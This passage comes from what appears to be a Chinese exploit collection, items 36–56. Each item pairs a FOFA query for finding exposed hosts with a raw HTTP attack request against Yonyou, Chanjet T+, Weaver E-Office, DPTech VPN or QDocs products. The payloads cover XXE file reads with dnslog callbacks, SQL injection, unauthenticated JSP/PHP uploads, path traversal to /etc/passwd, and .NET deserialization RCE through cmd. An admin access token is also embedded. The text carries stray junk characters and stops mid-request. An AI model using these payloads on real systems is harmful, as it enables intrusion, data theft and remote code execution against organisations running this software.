, P' P5 {7 B6 \' h0 EUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% g; |" w0 t1 I$ d1 F/ J, X% g
Accept-Encoding: gzip, deflate
' m' m" m% n/ c6 W/ {: G+ `Accept: */*
/ I9 H. M; p( j) P( D6 VConnection: close
" q6 k6 {, I4 _! W u7 |. haccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
3 [# ^0 M# L T$ k, d, MContent-Length: 1907 _) `5 [5 [& E7 }3 ]" x
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0+ K) S: B$ t, Q& u( D; U' E
& t$ j+ d1 f9 `% x. a: e7 S/ }2 y
--fd28cb44e829ed1c197ec3bc71748df0; I( A; R' ^9 E( e- j/ U3 Q8 @3 S
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
# p" [9 ^3 X8 S+ U9 S
" L* }* Z: Y- ], ^3 {7 s, ^. G) J ^+ ^/ v<%out.println(1111*1111);%>) W7 @3 N8 `3 B; _
--fd28cb44e829ed1c197ec3bc71748df0--
0 q3 f w3 X y+ n- k
0 F$ O+ ^% T. J [: @' C% `) ? x1 b+ z e% [
36. 用友NC-Cloud soapFormat XXE0 F9 Z6 Z1 J1 K2 b" A
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"& d; H/ B6 L0 P1 O
POST /uapws/soapFormat.ajax HTTP/1.1
" X* v" N6 M/ q2 T1 b3 l) H) XHost: 192.168.40.130:8989) R' L6 r' X. x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
+ P6 ~& x% o& {5 @ G& kContent-Length: 263
6 W* `$ E+ ?1 B! N+ `+ LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ q! G! z( s+ ?, V2 `+ C7 x9 M1 ZAccept-Encoding: gzip, deflate
. R7 g( K8 l8 \0 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& N2 E. b/ R$ Y6 D, t( Y- |
Connection: close9 |& r+ A; V: d- A' P1 y
Content-Type: application/x-www-form-urlencoded j# O/ Q4 i2 i0 }! _$ h
Upgrade-Insecure-Requests: 1
4 k% ?6 f# a: _# J, Z/ ]5 j0 H. x8 @8 h# L: h0 K. v: z C m
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a2 u& S8 ]0 `; {2 ~8 @) c
% I) B& o6 \- p! r6 w% ~$ Y8 Q! B
# A9 v% v `) K: ]
37. 用友NC-Cloud IUpdateService XXE( `& r: h7 y3 V' ~: A
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
& t2 c4 S; X2 i" D: MPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
2 ~& d8 l3 n( w0 SHost: 192.168.40.130:8989) X7 l% |% l- l. @3 d8 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) U) p$ V$ o+ Y! O
Content-Length: 421
6 J# j5 Z0 L' b( M3 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! W4 v- p' D- v9 P+ m# u4 CAccept-Encoding: gzip, deflate
- w* j8 c' h. ^4 j/ t7 d7 ?0 yAccept-Language: zh-CN,zh;q=0.9; U- a& e- {: [4 R
Connection: close
& M/ x2 }0 i2 W5 lContent-Type: text/xml;charset=UTF-8* \: V- W4 B4 V0 V, x9 L
SOAPAction: urn:getResult
+ R: |, v# D8 z5 {: @! BUpgrade-Insecure-Requests: 1
5 a0 b9 P6 y! i1 v. n
9 T( _& F% G& m) k<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
$ B5 T+ l7 b% N) i" x<soapenv:Header/>
' p$ i- F' o: J3 W<soapenv:Body>4 |( Q: x. m' E2 M' E7 L8 i
<iup:getResult>/ x" G5 A, m, U, `5 @- x7 q! Q
<!--type: string-->
. T2 M; y) E9 n( I<iup:string><![CDATA[
4 A9 ~* \* G- q<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
* t0 Y9 n% s4 ?4 B7 _& _<xxx/>]]></iup:string> o* l8 o- g2 L: E3 [+ F
</iup:getResult>
* \" v- j0 |! P! ]. ~& D: W1 x9 ]' }</soapenv:Body>
J3 \' G4 ?* z! b7 b</soapenv:Envelope>
( l- ]0 h1 p g, \2 k# f2 Z4 V- b) x8 F
. ~& v5 a# A9 j, Q! a1 e: H% C* E3 v
1 q9 M9 c' ]9 D1 A" h
38. 用友U8 Cloud smartweb2.RPC.d XXE
6 y" d `1 o4 Q P4 H; G' tFOFA:app="用友-U8-Cloud"
- A) I- C$ \" L) W2 g! Z: |POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
# U% z6 S; T; N+ B8 ]Host: 192.168.40.131:8088) `( R1 s5 D+ G9 E5 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
4 e% f4 n; q2 HContent-Length: 260
" G6 Z3 [# K& ~, P, ~* BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+ H1 x. J$ W7 PAccept-Encoding: gzip, deflate
$ {, Y' c1 Z( L- b( n: hAccept-Language: zh-CN,zh;q=0.9
2 E- U$ A1 s- w6 vConnection: close4 T2 T9 w# I# w) k+ Q3 z1 }9 W( Q
Content-Type: application/x-www-form-urlencoded
( C0 J- b* g! t& M% m, q% S% }! z/ f5 d
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
, ]8 ?% o/ p f5 n
" Z2 P% y0 m! l. c- o2 S! D8 R* z7 ~7 z
39. 用友U8 Cloud RegisterServlet SQL注入3 l& y1 J( ~5 Q5 }* y* k0 k; {" m" u
FOFA:title="u8c"
1 i6 s' _; z2 s$ NPOST /servlet/RegisterServlet HTTP/1.1- o8 q4 B1 s, Z, p7 Z( f0 Z, e
Host: 192.168.86.128:80890 g4 K* i4 ]/ s) q/ m; A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
6 {1 V7 w9 s8 x$ iConnection: close9 I. p- j# M1 T# z4 i4 H) j5 s
Content-Length: 85
% i9 ~; D. i9 c2 F# ZAccept: */*
# c+ ^ I, _' ?- H% J6 RAccept-Language: en0 g3 i' I* {" L' z4 z
Content-Type: application/x-www-form-urlencoded
+ w A0 r2 h- u( TX-Forwarded-For: 127.0.0.1
9 Q8 Y+ Z R5 N* Q) IAccept-Encoding: gzip
* m) g8 |9 H4 J( \ `" l- X( d# K% R8 a' w. I R# l
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
! j0 s, e6 L5 C) I+ r4 t! e( J, g \- h7 k U8 l% R% Q2 W& d. J
7 M9 P) Z4 r4 }& h) k' @# b
40. 用友U8-Cloud XChangeServlet XXE
. u) U7 l8 x! i1 U( ]FOFA:app="用友-U8-Cloud"! S1 g* w/ W$ S' X
POST /service/XChangeServlet HTTP/1.1, X8 H0 F0 {( V! ?
Host: x.x.x.x
& E/ Z& Z2 N1 P. @6 |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 H4 E1 j8 v) f
Content-Type: text/xml; W# m4 P3 I9 F# x9 a: X5 @
Connection: close
( q: m7 l# K- F' g. u2 S# a9 d3 n3 H' H* T% U4 V1 Z% V8 K/ p( a
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>3 h& k! w D3 W
4 R G3 I! t& |2 u/ P9 i8 i( m0 Z1 f7 n8 ?3 n7 k
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
o4 Y2 z9 c4 \- P) E: ?& pFOFA:app="用友-U8-Cloud"- t0 U @. { F
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
" K) ?4 {( Z4 tHost:
+ I+ l# T& G( P4 _0 U( sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 i3 X7 @& r! |3 f! [8 IContent-Type: application/json
9 Q9 B9 M. ~& d% J. WAccept-Encoding: gzip
+ i2 p2 I& ]" m! P, s) [( J" V8 ^7 CConnection: close+ I9 K% a) [# ] S/ V3 i; C1 n7 [
* j4 p: ~% P3 S( y- c0 I+ u. ~7 \% J4 f: I
42. 用友GRP-U8 SmartUpload01 文件上传
3 L6 |. Z( @$ ~# P& Z, C: [- zFOFA:app="用友-GRP-U8"- Q4 _* |6 ^$ W+ p
POST /u8qx/SmartUpload01.jsp HTTP/1.1" N2 |; f3 i+ X( c
Host: x.x.x.x1 P9 {' T6 p% {! C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
: W. O7 j3 X- nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
" K4 G% [& S* z! N( t8 m8 S) P& Y0 I
/ F, t7 w; j. e' g4 l! [6 n7 HPAYLOAD: I) ^5 [" {6 D2 X
! s' q" d# e; b# d$ h; N
$ [4 s) ^7 g5 d9 f. M9 B7 P% khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
& |2 m7 x3 W- C
; |# B8 T1 N. D# S) b1 x& r43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ a" x" q; w1 _& pFOFA:app="用友-GRP-U8"
: I- [1 r1 X" T) R% gPOST /services/userInfoWeb HTTP/1.1
- ]. X: Y/ v% _+ `3 o6 Y6 |# T3 {Host: your-ip; {2 C/ E" b, V' h) y2 q: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 o/ P: w4 T2 y2 m0 O2 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; @6 }1 G' |8 k' B2 K5 oAccept-Encoding: gzip, deflate) J. w" O7 Y" a
Accept-Language: zh-CN,zh;q=0.9, t8 y$ k0 }$ n2 K4 A! q5 [
Connection: close, F+ V9 D" t* A" b" d/ \6 k
SOAPAction:
. A8 n! ~; I6 K% f% IContent-Type: text/xml;charset=UTF-8# [2 v9 Y- w2 q5 @' O1 d) d/ y; X
7 t! J5 g4 D' Y+ h7 ?! r
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com"> V9 i/ r4 W( ?& H$ `) r
<soapenv:Header/>
7 e% f7 f J6 f/ H7 c5 S A7 u <soapenv:Body>
0 W! J& Z N2 Q- c7 J ]3 H$ ^' |" X <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
4 [5 z7 X2 w% R( z$ X% X0 P: @ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>' v* [) G5 U, ^% \0 Q
</ser:getUserNameById>0 u# B" m& F0 W: }, T# z: I* P2 V
</soapenv:Body> C$ q! c1 E/ Q- l
</soapenv:Envelope>
2 L6 L# r% x+ ]. I( R K* M6 k+ f7 l- _8 s8 o
# n7 P% L5 k, |
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- n O7 e+ v/ i$ t
FOFA:app="用友-GRP-U8"" a/ k f0 a5 S9 m' m
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 K k" Y6 G8 e( [) u# }7 J% q$ ^0 DHost: your-ip5 [1 |+ z" y. j9 J# g' O+ a; D: b& a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.365 I+ K" e g) p# `' Y, O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! H2 `4 B& w5 a2 a
Accept-Encoding: gzip, deflate
! Q: w7 U' R6 d. y( |Accept-Language: zh-CN,zh;q=0.94 S( X7 d0 x, k# O8 e. R- {
Connection: close n8 ?% x( s4 J0 s* b# b$ l
: z6 ? v6 b& k- P3 X `- _" i6 R) a0 T+ h. k$ z9 I4 Z
45. 用友GRP-U8 ufgovbank XXE0 J& T6 J& o; V! s; @2 r; r
FOFA:app="用友-GRP-U8"
$ ?/ }# p! _6 z+ A" s' a: g+ S( kPOST /ufgovbank HTTP/1.1" K: t/ Z( F) S# c( q- V
Host: 192.168.40.130:222
: c$ k( o% d& W8 g2 X; k# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0# V8 ^8 S' P# A
Connection: close
1 {+ v$ \# ^% c# N& KContent-Length: 161
, Q7 b! ]8 i8 f+ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# P2 `4 ?* i9 q3 ~, [% d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ L8 c2 O+ X, p5 |+ H. Z2 }( hContent-Type: application/x-www-form-urlencoded9 T' I) C ^- ^) r
Accept-Encoding: gzip
& C# [* y; X/ Q1 l/ L* g8 }9 C# T* g% d( ~0 [3 G/ {
reqData=<?xml version="1.0"?>3 Q6 ?7 S" W& s, ?% S' P
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest) ~4 _! j# }( T" F0 V( K
1 [" {% r; @1 w* N# k4 O! g$ d6 K
9 {, {4 S3 I; `! {8 P2 {7 l7 I$ O9 _8 @
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 q5 G- h. R2 v. c/ HFOFA:app="用友-GRP-U8"
5 A: _6 ^" S+ L# YGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
_, q0 I ^' f& B4 K, iHost: your-ip' Q- a; h! E3 A$ d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
4 e! Y7 |+ v* f# ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 y* Q6 n' m- m$ C5 q
Accept-Encoding: gzip, deflate
' y- x- U" D) ]. E- K& r% GAccept-Language: zh-CN,zh;q=0.9$ d7 g9 U% [# e( l& l4 M( @% a
Connection: close
) N* t; a1 m b- x) p% _7 y3 D8 N4 ?" i1 l2 m* q* ]4 I8 `) g
, N# U$ ^% y. Q, E. s
47. 用友GRP A++Cloud 政府财务云 任意文件读取1 a" Y4 F+ N$ \& @. W# H
FOFA:body="/pf/portal/login/css/fonts/style.css"
0 e5 C; m$ V! cGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1/ x& c _# J$ Y
Host: x.x.x.x
) j; v: d$ o3 y9 |Cache-Control: max-age=0/ D1 ?' C& Q/ y) Z B& A( b
Upgrade-Insecure-Requests: 1
8 e8 u" l9 H# M/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 Z0 \2 M$ C' d" B& R/ E+ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 W" O. z" T+ t6 K$ K
Accept-Encoding: gzip, deflate, br: i. H: n0 z: s8 Z3 M- W! f
Accept-Language: zh-CN,zh;q=0.9
. n, C% b5 v2 G- A% xIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
, S. u6 E6 i1 \2 ZConnection: close
6 w( y- }/ E" N3 N! P" O
, s1 R) X0 P. j3 L: a. P1 N/ N: H2 z$ d* r! I( ~
' Z* N. E: a; x5 U1 l48. 用友U8 CRM swfupload 任意文件上传
D% D& J" C: YFOFA:title="用友U8CRM"
) O. C) |/ c- i y( j6 pPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1. a7 {6 o( L. j, G
Host: your-ip% V& t, v# \' t1 C1 v# l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 S9 e/ N& L" X% H1 ^+ u* q# ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 O1 `% L* x! a+ F' kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ D+ \( e* z+ X4 CAccept-Encoding: gzip, deflate
) t2 l! q; k) m& l0 e) M0 P* fContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
3 q. s, e* m9 M/ |------269520967239406871642430066855
' d0 b+ }0 L# P2 [& fContent-Disposition: form-data; name="file"; filename="s.php"! {3 h6 Z1 j( V7 L' s5 [! I
12311 f$ A- s2 F5 b+ E
Content-Type: application/octet-stream- u% X$ I7 w$ j# _
------269520967239406871642430066855" z1 H# s6 n1 C w% m1 w! ?" t' Q
Content-Disposition: form-data; name="upload"
N- C/ Z, O$ v4 [( P @upload
; H0 W# G& V' y6 T3 k------269520967239406871642430066855-- A5 m6 Z, T+ C" Z( u; a
3 u. E" h5 }( _3 p0 }
) d6 c9 a; @. o1 A: x/ z# g2 r49. 用友U8 CRM系统uploadfile.php接口任意文件上传
7 V/ P% t: c( M" i: U$ x. w. A& J: [FOFA:body="用友U8CRM"
9 F; j" R; _" f1 l2 \& u! D
/ N2 u* j- V, P8 F7 F5 m# n- [POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.14 X' @* c4 u/ `- b" I- Z
Host: x.x.x.x# ?- X! C/ b5 Q, Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 D2 i. q1 c6 z5 a9 {% AContent-Length: 329
* D- I' W, a. J4 f( X/ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 _3 ]& e7 r a8 @8 ~3 J" rAccept-Encoding: gzip, deflate
( Y1 }! X, R4 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ y6 ^* R) H% s: {" X
Connection: close
1 g! R Q/ n& g/ t/ @" y* QContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# [! @/ |9 `1 F3 O8 E. s* }" f! u; j* b: v1 r3 P6 e% D9 m- \# e3 o
-----------------------------vvv3wdayqv3yppdxvn3w
' \4 L+ G5 s% W" b J" uContent-Disposition: form-data; name="file"; filename="%s.php "5 U& u) N( |; s; `& b; U
Content-Type: application/octet-stream
* q! G0 w1 n9 a: k! r- `4 ^3 p- r+ I: ^
wersqqmlumloqa0 h+ u. j# \7 I8 y' X. I
-----------------------------vvv3wdayqv3yppdxvn3w
& I0 Y) `3 ~& _! c6 aContent-Disposition: form-data; name="upload", b% m1 l8 \) a/ ]
- V+ c& k. H) Yupload/ r' K$ R8 U" m
-----------------------------vvv3wdayqv3yppdxvn3w--
/ g) N7 g: f4 Y0 W7 ~# l) h* `' ]% N
+ U8 ~5 \2 K3 I8 Ahttp://x.x.x.x/tmpfile/updB3CB.tmp.php
3 l$ [. x/ j/ {& S
3 Q5 |* g" d: ?50. QDocs Smart School 6.4.1 filterRecords SQL注入; u) D1 q; u1 M
FOFA:body="close closebtnmodal"' z' T' I% i1 ^4 F
POST /course/filterRecords/ HTTP/1.1
' n/ H/ ^" w. k' q+ d- b$ ]Host: x.x.x.x7 Y( `% p; N9 Z- [) s+ J+ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 z6 s$ |( K1 J! [
Connection: close" z# v1 c4 I9 E
Content-Length: 224& C8 ?# m9 L1 ]9 U' G
Accept: */*+ `9 U; c% p! U2 O2 Y6 `. t
Accept-Language: en1 h6 w. f5 D5 u
Content-Type: application/x-www-form-urlencoded
' j- i) h- e7 ]* Q7 X8 TAccept-Encoding: gzip2 R( E n+ z* Z/ p3 e/ h# o
/ i% C9 b. G! Z, n) x8 z& O
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
8 i4 R6 U7 h5 `3 p3 M; H( \: ~$ l S$ U; T' i) I
6 f* X% i* O/ v6 W0 @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入( B; o4 L$ a+ U4 r) ?. A
FOFA:app="云时空社会化商业ERP系统"
+ ?- d9 T. t$ K+ }% hGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1& ~! f( w. U! i' M6 [% v4 q n; F
Host: your-ip
! t7 |% E n7 O/ U6 F' m4 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36$ s$ o" R9 L1 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; _7 t; y/ t0 N3 G
Accept-Encoding: gzip, deflate) C7 R# ?3 A; A- {; L
Accept-Language: zh-CN,zh;q=0.98 w) ]0 W: P( q& ^3 F* a
Connection: close
! z: j+ E% l% V' a7 e/ R" ^- q/ @& k$ _8 c+ P' ^4 _, f9 g
L9 g+ d& G1 w8 \
52. 泛微E-Office json_common.php sql注入
- G: {% v# [+ i; {FOFA:app="泛微-EOffice"
$ v7 A. M0 w. V9 A8 u2 cPOST /building/json_common.php HTTP/1.1- _! M# q0 m; H4 s1 a
Host: 192.168.86.128:80972 |3 {8 C6 q4 H( Y3 O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) R' Y! s- J0 H( N
Connection: close3 M2 w Q# Z$ X1 w
Content-Length: 876 u1 k, y/ m& t# V( T5 H# A
Accept: */*& [ t) H' }: p' P) P( B% \0 [
Accept-Language: en7 m3 c# c$ y4 ?: o
Content-Type: application/x-www-form-urlencoded
& L9 S# T" t7 P. ^# G0 YAccept-Encoding: gzip3 Y+ j. a- c, m. q7 A0 T9 B( [
& |( e* x% C8 z5 `% z. U
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3334 F+ u7 P3 B: ]( K) `- E8 ]% D' D
+ L, c0 X Z: v, j6 k& k6 g, U
/ q0 y) n. j1 h
53. 迪普 DPTech VPN Service 任意文件上传
+ U# Y; J) Q: b9 RFOFA:app="DPtech-SSLVPN"7 `: V7 D- y6 w' U! f: X
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
0 z3 Y- p0 R$ y5 Y! V9 p8 @8 r4 r1 T" m4 |. d; O
m' z. F; m: Z" s6 i& V3 s# p
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; X ], k" J, k4 [4 Y, PFOFA:app="畅捷通-TPlus"
# I2 H; b1 i# s第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
, ~) J/ a5 {9 p0 t"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"5 S) i; K3 n1 n9 i4 `) `* z
# k* n+ f) O' A& X
4 w! z) z1 G5 f/ m1 U完整数据包8 Q% S8 c P$ g0 W
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
8 F0 l* w" H: W7 NHost: x.x.x.x1 @* E: H( H5 e. W
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
5 S. }6 `1 Z9 E' jContent-Length: 593, i9 j/ J* }7 [: b) N y! M
2 T$ G# Y6 j, T+ Z# j" |# ] H N{0 N, o0 R/ J$ ?: C
"storeID":{
* J! J9 w9 e$ V7 i* N" }' N "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
0 |: L- g% E$ Y, s9 [ "MethodName":"Start",* q1 a+ x/ K2 I4 z. B
"ObjectInstance":{
$ M) u2 s; R) {2 C0 C# @! G "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 A9 z/ L! q/ T( G7 ^4 X$ E
"StartInfo":{0 I& T, b6 M' ]1 u6 ~- R
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* d' j3 @' _4 s) j/ F1 ~ "FileName":"cmd",
1 e W2 A2 n6 ^3 W" s; { "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"3 T6 [& _) p6 u4 }
}2 U2 a( \0 m" O0 n1 R
}
- g; |3 t7 ^, \ }
" g# K, y) ~! q7 R; F}& @; B2 P: k# _4 j/ I4 U4 \8 X4 d0 D
1 b( j( ^6 W9 T# q* h' U J6 R
, q- V) t( W; ^% r+ w+ B8 x1 z0 I第二步,访问如下url
+ b2 ~( C: a2 l, ]- L/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
$ v8 l: b1 a% f6 R! M+ X6 P5 b% |9 R
) N% @( K* v# _
' l6 [. g( K5 H) x' B55. 畅捷通T+ getdecallusers信息泄露' v& D. y1 c/ d8 K6 y; M( U
FOFA:app="畅捷通-TPlus"
2 s% D7 t: R3 b5 K5 P/ S% E第一步,通过2 o) b; r+ @4 \7 o. G
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie$ y2 [/ ~5 u% i3 ]
第二步,利用获取到的Cookie请求% u- q' v+ ^. m9 d
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
; r5 s* p) K9 h
. l" u7 P9 E; ]$ g% E: }7 H g8 M* d. e56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
9 P& B; A4 M% MFOFA: app="畅捷通-TPlus"3 | h& q. g. J
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1& v% x' h2 }% E1 e$ w) |
Host: x.x.x.x9 d- j5 z8 F& P8 v2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36& y; Y& x4 G& ]& V
Content-Type: application/json h* [3 c% P$ N( T* e* Y6 y
/ S+ M6 O5 D7 A) W( s$ _$ a& o{8 N- ? `6 b* q2 x! Z
"storeID":{
